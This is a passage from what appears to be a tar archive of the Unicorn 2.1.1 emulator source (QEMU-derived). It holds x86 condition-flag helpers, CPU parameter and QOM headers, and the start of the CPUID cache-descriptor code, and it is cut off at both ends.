compute_all_adcq(dst, src1, src2); case CC_OP_SUBQ: return compute_all_subq(dst, src1); case CC_OP_SBBQ: return compute_all_sbbq(dst, src1, src2); case CC_OP_LOGICQ: return compute_all_logicq(dst, src1); case CC_OP_INCQ: return compute_all_incq(dst, src1); case CC_OP_DECQ: return compute_all_decq(dst, src1); case CC_OP_SHLQ: return compute_all_shlq(dst, src1); case CC_OP_SARQ: return compute_all_sarq(dst, src1); case CC_OP_BMILGQ: return compute_all_bmilgq(dst, src1); #endif } } uint32_t cpu_cc_compute_all(CPUX86State *env, int op) { return (uint32_t)helper_cc_compute_all(CC_DST, CC_SRC, CC_SRC2, op); } target_ulong helper_cc_compute_c(target_ulong dst, target_ulong src1, target_ulong src2, int op) { switch (op) { default: /* should never happen */ case CC_OP_LOGICB: case CC_OP_LOGICW: case CC_OP_LOGICL: case CC_OP_LOGICQ: case CC_OP_CLR: case CC_OP_POPCNT: return 0; case CC_OP_EFLAGS: case CC_OP_SARB: case CC_OP_SARW: case CC_OP_SARL: case CC_OP_SARQ: case CC_OP_ADOX: return src1 & 1; case CC_OP_INCB: case CC_OP_INCW: case CC_OP_INCL: case CC_OP_INCQ: case CC_OP_DECB: case CC_OP_DECW: case CC_OP_DECL: case CC_OP_DECQ: return src1; case CC_OP_MULB: case CC_OP_MULW: case CC_OP_MULL: case CC_OP_MULQ: return src1 != 0; case CC_OP_ADCX: case CC_OP_ADCOX: return dst; case CC_OP_ADDB: return compute_c_addb(dst, src1); case CC_OP_ADDW: return compute_c_addw(dst, src1); case CC_OP_ADDL: return compute_c_addl(dst, src1); case CC_OP_ADCB: return compute_c_adcb(dst, src1, src2); case CC_OP_ADCW: return compute_c_adcw(dst, src1, src2); case CC_OP_ADCL: return compute_c_adcl(dst, src1, src2); case CC_OP_SUBB: return compute_c_subb(dst, src1); case CC_OP_SUBW: return compute_c_subw(dst, src1); case CC_OP_SUBL: return compute_c_subl(dst, src1); case CC_OP_SBBB: return compute_c_sbbb(dst, src1, src2); case CC_OP_SBBW: return compute_c_sbbw(dst, src1, src2); case CC_OP_SBBL: return compute_c_sbbl(dst, src1, src2); case CC_OP_SHLB: return compute_c_shlb(dst, src1); case CC_OP_SHLW: return compute_c_shlw(dst, src1); case CC_OP_SHLL: return compute_c_shll(dst, src1); case CC_OP_BMILGB: return compute_c_bmilgb(dst, src1); case CC_OP_BMILGW: return compute_c_bmilgw(dst, src1); case CC_OP_BMILGL: return compute_c_bmilgl(dst, src1); #ifdef TARGET_X86_64 case CC_OP_ADDQ: return compute_c_addq(dst, src1); case CC_OP_ADCQ: return compute_c_adcq(dst, src1, src2); case CC_OP_SUBQ: return compute_c_subq(dst, src1); case CC_OP_SBBQ: return compute_c_sbbq(dst, src1, src2); case CC_OP_SHLQ: return compute_c_shlq(dst, src1); case CC_OP_BMILGQ: return compute_c_bmilgq(dst, src1); #endif } } void helper_write_eflags(CPUX86State *env, target_ulong t0, uint32_t update_mask) { cpu_load_eflags(env, (int)t0, update_mask); } target_ulong helper_read_eflags(CPUX86State *env) { return cpu_compute_eflags(env); } void helper_clts(CPUX86State *env) { env->cr[0] &= ~CR0_TS_MASK; env->hflags &= ~HF_TS_MASK; } void helper_reset_rf(CPUX86State *env) { env->eflags &= ~RF_MASK; } void helper_cli(CPUX86State *env) { env->eflags &= ~IF_MASK; } void helper_sti(CPUX86State *env) { env->eflags |= IF_MASK; } void helper_clac(CPUX86State *env) { env->eflags &= ~AC_MASK; } void helper_stac(CPUX86State *env) { env->eflags |= AC_MASK; } #if 0 /* vm86plus instructions */ void helper_cli_vm(CPUX86State *env) { env->eflags &= ~VIF_MASK; } void helper_sti_vm(CPUX86State *env) { env->eflags |= VIF_MASK; if (env->eflags & VIP_MASK) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } } #endif ����������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/cc_helper_template.h�������������������������������������������������0000664�0000000�0000000�00000015146�14675241067�0022131�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 condition code helpers * * Copyright (c) 2008 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #define DATA_BITS (1 << (3 + SHIFT)) #if DATA_BITS == 8 #define SUFFIX b #define DATA_TYPE uint8_t #elif DATA_BITS == 16 #define SUFFIX w #define DATA_TYPE uint16_t #elif DATA_BITS == 32 #define SUFFIX l #define DATA_TYPE uint32_t #elif DATA_BITS == 64 #define SUFFIX q #define DATA_TYPE uint64_t #else #error unhandled operand size #endif #define SIGN_MASK (((DATA_TYPE)1) << (DATA_BITS - 1)) /* dynamic flags computation */ static int glue(compute_all_add, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; DATA_TYPE src2 = dst - src1; cf = dst < src1; pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & CC_A; zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = lshift((src1 ^ src2 ^ -1) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_c_add, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { return dst < src1; } static int glue(compute_all_adc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1, DATA_TYPE src3) { int cf, pf, af, zf, sf, of; DATA_TYPE src2 = dst - src1 - src3; cf = (src3 ? dst <= src1 : dst < src1); pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & 0x10; zf = (dst == 0) << 6; sf = lshift(dst, 8 - DATA_BITS) & 0x80; of = lshift((src1 ^ src2 ^ -1) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_c_adc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1, DATA_TYPE src3) { return src3 ? dst <= src1 : dst < src1; } static int glue(compute_all_sub, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2) { int cf, pf, af, zf, sf, of; DATA_TYPE src1 = dst + src2; cf = src1 < src2; pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & CC_A; zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = lshift((src1 ^ src2) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_c_sub, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2) { DATA_TYPE src1 = dst + src2; return src1 < src2; } static int glue(compute_all_sbb, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2, DATA_TYPE src3) { int cf, pf, af, zf, sf, of; DATA_TYPE src1 = dst + src2 + src3; cf = (src3 ? src1 <= src2 : src1 < src2); pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & 0x10; zf = (dst == 0) << 6; sf = lshift(dst, 8 - DATA_BITS) & 0x80; of = lshift((src1 ^ src2) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_c_sbb, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2, DATA_TYPE src3) { DATA_TYPE src1 = dst + src2 + src3; return (src3 ? src1 <= src2 : src1 < src2); } static int glue(compute_all_logic, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; cf = 0; pf = parity_table[(uint8_t)dst]; af = 0; zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = 0; return cf | pf | af | zf | sf | of; } static int glue(compute_all_inc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; DATA_TYPE src2; cf = (int)src1; src1 = dst - 1; src2 = 1; pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & CC_A; zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = (dst == SIGN_MASK) * CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_all_dec, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; DATA_TYPE src2; cf = (int)src1; src1 = dst + 1; src2 = 1; pf = parity_table[(uint8_t)dst]; af = (dst ^ src1 ^ src2) & CC_A; zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = (dst == SIGN_MASK - 1) * CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_all_shl, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; cf = (src1 >> (DATA_BITS - 1)) & CC_C; pf = parity_table[(uint8_t)dst]; af = 0; /* undefined */ zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; /* of is defined iff shift count == 1 */ of = lshift(src1 ^ dst, 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_c_shl, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { return (src1 >> (DATA_BITS - 1)) & CC_C; } static int glue(compute_all_sar, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; cf = src1 & 1; pf = parity_table[(uint8_t)dst]; af = 0; /* undefined */ zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; /* of is defined iff shift count == 1 */ of = lshift(src1 ^ dst, 12 - DATA_BITS) & CC_O; return cf | pf | af | zf | sf | of; } /* NOTE: we compute the flags like the P4. On olders CPUs, only OF and CF are modified and it is slower to do that. Note as well that we don't truncate SRC1 for computing carry to DATA_TYPE. */ static int glue(compute_all_mul, SUFFIX)(DATA_TYPE dst, target_long src1) { int cf, pf, af, zf, sf, of; cf = (src1 != 0); pf = parity_table[(uint8_t)dst]; af = 0; /* undefined */ zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = cf * CC_O; return cf | pf | af | zf | sf | of; } static int glue(compute_all_bmilg, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { int cf, pf, af, zf, sf, of; cf = (src1 == 0); pf = 0; /* undefined */ af = 0; /* undefined */ zf = (dst == 0) * CC_Z; sf = lshift(dst, 8 - DATA_BITS) & CC_S; of = 0; return cf | pf | af | zf | sf | of; } static int glue(compute_c_bmilg, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) { return src1 == 0; } #undef DATA_BITS #undef SIGN_MASK #undef DATA_TYPE #undef DATA_MASK #undef SUFFIX ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/cpu-param.h����������������������������������������������������������0000664�0000000�0000000�00000001260�14675241067�0020167�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * i386 cpu parameters for qemu. * * Copyright (c) 2003 Fabrice Bellard * SPDX-License-Identifier: LGPL-2.0+ */ #ifndef I386_CPU_PARAM_H #define I386_CPU_PARAM_H 1 #ifdef TARGET_X86_64 # define TARGET_LONG_BITS 64 # define TARGET_PHYS_ADDR_SPACE_BITS 52 /* * ??? This is really 48 bits, sign-extended, but the only thing * accessible to userland with bit 48 set is the VSYSCALL, and that * is handled via other mechanisms. */ # define TARGET_VIRT_ADDR_SPACE_BITS 47 #else # define TARGET_LONG_BITS 32 # define TARGET_PHYS_ADDR_SPACE_BITS 36 # define TARGET_VIRT_ADDR_SPACE_BITS 32 #endif #define TARGET_PAGE_BITS 12 #define NB_MMU_MODES 3 #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/cpu-qom.h������������������������������������������������������������0000664�0000000�0000000�00000003543�14675241067�0017671�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU x86 CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_I386_CPU_QOM_H #define QEMU_I386_CPU_QOM_H #include "hw/core/cpu.h" typedef struct X86CPUModel X86CPUModel; /** * X86CPUClass: * @cpu_def: CPU model definition * @host_cpuid_required: Whether CPU model requires cpuid from host. * @ordering: Ordering on the "-cpu help" CPU model list. * @migration_safe: See CpuDefinitionInfo::migration_safe * @static_model: See CpuDefinitionInfo::static * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * * An x86 CPU model or family. */ typedef struct X86CPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ /* CPU definition, automatically loaded by instance_init if not NULL. * Should be eventually replaced by subclass-specific property defaults. */ X86CPUModel *model; bool host_cpuid_required; int ordering; bool static_model; /* Optional description of CPU model. * If unavailable, cpu_def->model_id is used */ const char *model_description; void (*parent_reset)(CPUState *cpu); } X86CPUClass; typedef struct X86CPU X86CPU; #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/cpu.c����������������������������������������������������������������0000664�0000000�0000000�00000636133�14675241067�0017101�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * i386 CPUID helper functions * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/units.h" #include "qemu/cutils.h" #include "qemu/bitops.h" #include "cpu.h" #include "exec/exec-all.h" #include "sysemu/cpus.h" #include "sysemu/sysemu.h" #include "sysemu/tcg.h" #include "hw/i386/topology.h" #include "uc_priv.h" static void x86_cpuid_version_set_family(X86CPU *cpu, int64_t value); static void x86_cpuid_version_set_model(X86CPU *cpu, int64_t value); static void x86_cpuid_version_set_stepping(X86CPU *cpu, int64_t value); static void x86_cpuid_set_model_id(X86CPU *cpu, const char* model_id); static void x86_cpuid_set_vendor(X86CPU *cpu , const char *value); /* Helpers for building CPUID[2] descriptors: */ struct CPUID2CacheDescriptorInfo { enum CacheType type; int level; int size; int line_size; int associativity; }; /* * Known CPUID 2 cache descriptors. * From Intel SDM Volume 2A, CPUID instruction */ static struct CPUID2CacheDescriptorInfo cpuid2_cache_descriptors[] = { [0x06] = { .level = 1, .type = INSTRUCTION_CACHE, .size = 8 * KiB, .associativity = 4, .line_size = 32, }, [0x08] = { .level = 1, .type = INSTRUCTION_CACHE, .size = 16 * KiB, .associativity = 4, .line_size = 32, }, [0x09] = { .level = 1, .type = INSTRUCTION_CACHE, .size = 32 * KiB, .associativity = 4, .line_size = 64, }, [0x0A] = { .level = 1, .type = DATA_CACHE, .size = 8 * KiB, .associativity = 2, .line_size = 32, }, [0x0C] = { .level = 1, .type = DATA_CACHE, .size = 16 * KiB, .associativity = 4, .line_size = 32, }, [0x0D] = { .level = 1, .type = DATA_CACHE, .size = 16 * KiB, .associativity = 4, .line_size = 64, }, [0x0E] = { .level = 1, .type = DATA_CACHE, .size = 24 * KiB, .associativity = 6, .line_size = 64, }, [0x1D] = { .level = 2, .type = UNIFIED_CACHE, .size = 128 * KiB, .associativity = 2, .line_size = 64, }, [0x21] = { .level = 2, .type = UNIFIED_CACHE, .size = 256 * KiB, .associativity = 8, .line_size = 64, }, /* lines per sector is not supported cpuid2_cache_descriptor(), * so descriptors 0x22, 0x23 are not included */ [0x24] = { .level = 2, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 16, .line_size = 64, }, /* lines per sector is not supported cpuid2_cache_descriptor(), * so descriptors 0x25, 0x20 are not included */ [0x2C] = { .level = 1, .type = DATA_CACHE, .size = 32 * KiB, .associativity = 8, .line_size = 64, }, [0x30] = { .level = 1, .type = INSTRUCTION_CACHE, .size = 32 * KiB, .associativity = 8, .line_size = 64, }, [0x41] = { .level = 2, .type = UNIFIED_CACHE, .size = 128 * KiB, .associativity = 4, .line_size = 32, }, [0x42] = { .level = 2, .type = UNIFIED_CACHE, .size = 256 * KiB, .associativity = 4, .line_size = 32, }, [0x43] = { .level = 2, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 4, .line_size = 32, }, [0x44] = { .level = 2, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 4, .line_size = 32, }, [0x45] = { .level = 2, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 4, .line_size = 32, }, [0x46] = { .level = 3, .type = UNIFIED_CACHE, .size = 4 * MiB, .associativity = 4, .line_size = 64, }, [0x47] = { .level = 3, .type = UNIFIED_CACHE, .size = 8 * MiB, .associativity = 8, .line_size = 64, }, [0x48] = { .level = 2, .type = UNIFIED_CACHE, .size = 3 * MiB, .associativity = 12, .line_size = 64, }, /* Descriptor 0x49 depends on CPU family/model, so it is not included */ [0x4A] = { .level = 3, .type = UNIFIED_CACHE, .size = 6 * MiB, .associativity = 12, .line_size = 64, }, [0x4B] = { .level = 3, .type = UNIFIED_CACHE, .size = 8 * MiB, .associativity = 16, .line_size = 64, }, [0x4C] = { .level = 3, .type = UNIFIED_CACHE, .size = 12 * MiB, .associativity = 12, .line_size = 64, }, [0x4D] = { .level = 3, .type = UNIFIED_CACHE, .size = 16 * MiB, .associativity = 16, .line_size = 64, }, [0x4E] = { .level = 2, .type = UNIFIED_CACHE, .size = 6 * MiB, .associativity = 24, .line_size = 64, }, [0x60] = { .level = 1, .type = DATA_CACHE, .size = 16 * KiB, .associativity = 8, .line_size = 64, }, [0x66] = { .level = 1, .type = DATA_CACHE, .size = 8 * KiB, .associativity = 4, .line_size = 64, }, [0x67] = { .level = 1, .type = DATA_CACHE, .size = 16 * KiB, .associativity = 4, .line_size = 64, }, [0x68] = { .level = 1, .type = DATA_CACHE, .size = 32 * KiB, .associativity = 4, .line_size = 64, }, [0x78] = { .level = 2, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 4, .line_size = 64, }, /* lines per sector is not supported cpuid2_cache_descriptor(), * so descriptors 0x79, 0x7A, 0x7B, 0x7C are not included. */ [0x7D] = { .level = 2, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 8, .line_size = 64, }, [0x7F] = { .level = 2, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 2, .line_size = 64, }, [0x80] = { .level = 2, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 8, .line_size = 64, }, [0x82] = { .level = 2, .type = UNIFIED_CACHE, .size = 256 * KiB, .associativity = 8, .line_size = 32, }, [0x83] = { .level = 2, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 8, .line_size = 32, }, [0x84] = { .level = 2, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 8, .line_size = 32, }, [0x85] = { .level = 2, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 8, .line_size = 32, }, [0x86] = { .level = 2, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 4, .line_size = 64, }, [0x87] = { .level = 2, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 8, .line_size = 64, }, [0xD0] = { .level = 3, .type = UNIFIED_CACHE, .size = 512 * KiB, .associativity = 4, .line_size = 64, }, [0xD1] = { .level = 3, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 4, .line_size = 64, }, [0xD2] = { .level = 3, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 4, .line_size = 64, }, [0xD6] = { .level = 3, .type = UNIFIED_CACHE, .size = 1 * MiB, .associativity = 8, .line_size = 64, }, [0xD7] = { .level = 3, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 8, .line_size = 64, }, [0xD8] = { .level = 3, .type = UNIFIED_CACHE, .size = 4 * MiB, .associativity = 8, .line_size = 64, }, [0xDC] = { .level = 3, .type = UNIFIED_CACHE, .size = 1.5 * MiB, .associativity = 12, .line_size = 64, }, [0xDD] = { .level = 3, .type = UNIFIED_CACHE, .size = 3 * MiB, .associativity = 12, .line_size = 64, }, [0xDE] = { .level = 3, .type = UNIFIED_CACHE, .size = 6 * MiB, .associativity = 12, .line_size = 64, }, [0xE2] = { .level = 3, .type = UNIFIED_CACHE, .size = 2 * MiB, .associativity = 16, .line_size = 64, }, [0xE3] = { .level = 3, .type = UNIFIED_CACHE, .size = 4 * MiB, .associativity = 16, .line_size = 64, }, [0xE4] = { .level = 3, .type = UNIFIED_CACHE, .size = 8 * MiB, .associativity = 16, .line_size = 64, }, [0xEA] = { .level = 3, .type = UNIFIED_CACHE, .size = 12 * MiB, .associativity = 24, .line_size = 64, }, [0xEB] = { .level = 3, .type = UNIFIED_CACHE, .size = 18 * MiB, .associativity = 24, .line_size = 64, }, [0xEC] = { .level = 3, .type = UNIFIED_CACHE, .size = 24 * MiB, .associativity = 24, .line_size = 64, }, }; /* * "CPUID leaf 2 does not report cache descriptor information, * use CPUID leaf 4 to query cache parameters" */ #define CACHE_DESCRIPTOR_UNAVAILABLE 0xFF /* * Return a CPUID 2 cache descriptor for a given cache. * If no known descriptor is found, return CACHE_DESCRIPTOR_UNAVAILABLE */ static uint8_t cpuid2_cache_descriptor(CPUCacheInfo *cache) { int i; assert(cache->size > 0); assert(cache->level > 0); assert(cache->line_size > 0); assert(cache->associativity > 0); for (i = 0; i < ARRAY_SIZE(cpuid2_cache_descriptors); i++) { struct CPUID2CacheDescriptorInfo *d = &cpuid2_cache_descriptors[i]; if (d->level == cache->level && d->type == cache->type && d->size == cache->size && d->line_size == cache->line_size && d->associativity == cache->associativity) { return i; } } return CACHE_DESCRIPTOR_UNAVAILABLE; } /* CPUID Leaf 4 constants: */ /* EAX: */ #define CACHE_TYPE_D 1 #define CACHE_TYPE_I 2 #define CACHE_TYPE_UNIFIED 3 #define CACHE_LEVEL(l) (l << 5) #define CACHE_SELF_INIT_LEVEL (1 << 8) /* EDX: */ #define CACHE_NO_INVD_SHARING (1 << 0) #define CACHE_INCLUSIVE (1 << 1) #define CACHE_COMPLEX_IDX (1 << 2) /* Encode CacheType for CPUID[4].EAX */ #define CACHE_TYPE(t) (((t) == DATA_CACHE) ? CACHE_TYPE_D : \ ((t) == INSTRUCTION_CACHE) ? CACHE_TYPE_I : \ ((t) == UNIFIED_CACHE) ? CACHE_TYPE_UNIFIED : \ 0 /* Invalid value */) /* Encode cache info for CPUID[4] */ static void encode_cache_cpuid4(CPUCacheInfo *cache, int num_apic_ids, int num_cores, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) { assert(cache->size == cache->line_size * cache->associativity * cache->partitions * cache->sets); assert(num_apic_ids > 0); *eax = CACHE_TYPE(cache->type) | CACHE_LEVEL(cache->level) | (cache->self_init ? CACHE_SELF_INIT_LEVEL : 0) | ((num_cores - 1) << 26) | ((num_apic_ids - 1) << 14); assert(cache->line_size > 0); assert(cache->partitions > 0); assert(cache->associativity > 0); /* We don't implement fully-associative caches */ assert(cache->associativity < cache->sets); *ebx = (cache->line_size - 1) | ((cache->partitions - 1) << 12) | ((cache->associativity - 1) << 22); assert(cache->sets > 0); *ecx = cache->sets - 1; *edx = (cache->no_invd_sharing ? CACHE_NO_INVD_SHARING : 0) | (cache->inclusive ? CACHE_INCLUSIVE : 0) | (cache->complex_indexing ? CACHE_COMPLEX_IDX : 0); } /* Encode cache info for CPUID[0x80000005].ECX or CPUID[0x80000005].EDX */ static uint32_t encode_cache_cpuid80000005(CPUCacheInfo *cache) { assert(cache->size % 1024 == 0); assert(cache->lines_per_tag > 0); assert(cache->associativity > 0); assert(cache->line_size > 0); return ((cache->size / 1024) << 24) | (cache->associativity << 16) | (cache->lines_per_tag << 8) | (cache->line_size); } #define ASSOC_FULL 0xFF /* AMD associativity encoding used on CPUID Leaf 0x80000006: */ #define AMD_ENC_ASSOC(a) (a <= 1 ? a : \ a == 2 ? 0x2 : \ a == 4 ? 0x4 : \ a == 8 ? 0x6 : \ a == 16 ? 0x8 : \ a == 32 ? 0xA : \ a == 48 ? 0xB : \ a == 64 ? 0xC : \ a == 96 ? 0xD : \ a == 128 ? 0xE : \ a == ASSOC_FULL ? 0xF : \ 0 /* invalid value */) /* * Encode cache info for CPUID[0x80000006].ECX and CPUID[0x80000006].EDX * @l3 can be NULL. */ static void encode_cache_cpuid80000006(CPUCacheInfo *l2, CPUCacheInfo *l3, uint32_t *ecx, uint32_t *edx) { assert(l2->size % 1024 == 0); assert(l2->associativity > 0); assert(l2->lines_per_tag > 0); assert(l2->line_size > 0); *ecx = ((l2->size / 1024) << 16) | (AMD_ENC_ASSOC(l2->associativity) << 12) | (l2->lines_per_tag << 8) | (l2->line_size); if (l3) { assert(l3->size % (512 * 1024) == 0); assert(l3->associativity > 0); assert(l3->lines_per_tag > 0); assert(l3->line_size > 0); *edx = ((l3->size / (512 * 1024)) << 18) | (AMD_ENC_ASSOC(l3->associativity) << 12) | (l3->lines_per_tag << 8) | (l3->line_size); } else { *edx = 0; } } /* Encode cache info for CPUID[8000001D] */ static void encode_cache_cpuid8000001d(CPUCacheInfo *cache, X86CPUTopoInfo *topo_info, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) { uint32_t l3_cores; unsigned nodes = MAX(topo_info->nodes_per_pkg, 1); assert(cache->size == cache->line_size * cache->associativity * cache->partitions * cache->sets); *eax = CACHE_TYPE(cache->type) | CACHE_LEVEL(cache->level) | (cache->self_init ? CACHE_SELF_INIT_LEVEL : 0); /* L3 is shared among multiple cores */ if (cache->level == 3) { l3_cores = DIV_ROUND_UP((topo_info->dies_per_pkg * topo_info->cores_per_die * topo_info->threads_per_core), nodes); *eax |= (l3_cores - 1) << 14; } else { *eax |= ((topo_info->threads_per_core - 1) << 14); } assert(cache->line_size > 0); assert(cache->partitions > 0); assert(cache->associativity > 0); /* We don't implement fully-associative caches */ assert(cache->associativity < cache->sets); *ebx = (cache->line_size - 1) | ((cache->partitions - 1) << 12) | ((cache->associativity - 1) << 22); assert(cache->sets > 0); *ecx = cache->sets - 1; *edx = (cache->no_invd_sharing ? CACHE_NO_INVD_SHARING : 0) | (cache->inclusive ? CACHE_INCLUSIVE : 0) | (cache->complex_indexing ? CACHE_COMPLEX_IDX : 0); } /* Encode cache info for CPUID[8000001E] */ static void encode_topo_cpuid8000001e(X86CPUTopoInfo *topo_info, X86CPU *cpu, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) { X86CPUTopoIDs topo_ids = {0}; unsigned long nodes = MAX(topo_info->nodes_per_pkg, 1); int shift; x86_topo_ids_from_apicid_epyc(cpu->apic_id, topo_info, &topo_ids); *eax = cpu->apic_id; /* * CPUID_Fn8000001E_EBX * 31:16 Reserved * 15:8 Threads per core (The number of threads per core is * Threads per core + 1) * 7:0 Core id (see bit decoding below) * SMT: * 4:3 node id * 2 Core complex id * 1:0 Core id * Non SMT: * 5:4 node id * 3 Core complex id * 1:0 Core id */ *ebx = ((topo_info->threads_per_core - 1) << 8) | (topo_ids.node_id << 3) | (topo_ids.core_id); /* * CPUID_Fn8000001E_ECX * 31:11 Reserved * 10:8 Nodes per processor (Nodes per processor is number of nodes + 1) * 7:0 Node id (see bit decoding below) * 2 Socket id * 1:0 Node id */ if (nodes <= 4) { *ecx = ((nodes - 1) << 8) | (topo_ids.pkg_id << 2) | topo_ids.node_id; } else { /* * Node id fix up. Actual hardware supports up to 4 nodes. But with * more than 32 cores, we may end up with more than 4 nodes. * Node id is a combination of socket id and node id. Only requirement * here is that this number should be unique accross the system. * Shift the socket id to accommodate more nodes. We dont expect both * socket id and node id to be big number at the same time. This is not * an ideal config but we need to to support it. Max nodes we can have * is 32 (255/8) with 8 cores per node and 255 max cores. We only need * 5 bits for nodes. Find the left most set bit to represent the total * number of nodes. find_last_bit returns last set bit(0 based). Left * shift(+1) the socket id to represent all the nodes. */ nodes -= 1; shift = find_last_bit(&nodes, 8); *ecx = (nodes << 8) | (topo_ids.pkg_id << (shift + 1)) | topo_ids.node_id; } *edx = 0; } /* * Definitions of the hardcoded cache entries we expose: * These are legacy cache values. If there is a need to change any * of these values please use builtin_x86_defs */ /* L1 data cache: */ static CPUCacheInfo legacy_l1d_cache = { .type = DATA_CACHE, .level = 1, .size = 32 * KiB, .self_init = 1, .line_size = 64, .associativity = 8, .sets = 64, .partitions = 1, .no_invd_sharing = true, }; /*FIXME: CPUID leaf 0x80000005 is inconsistent with leaves 2 & 4 */ static CPUCacheInfo 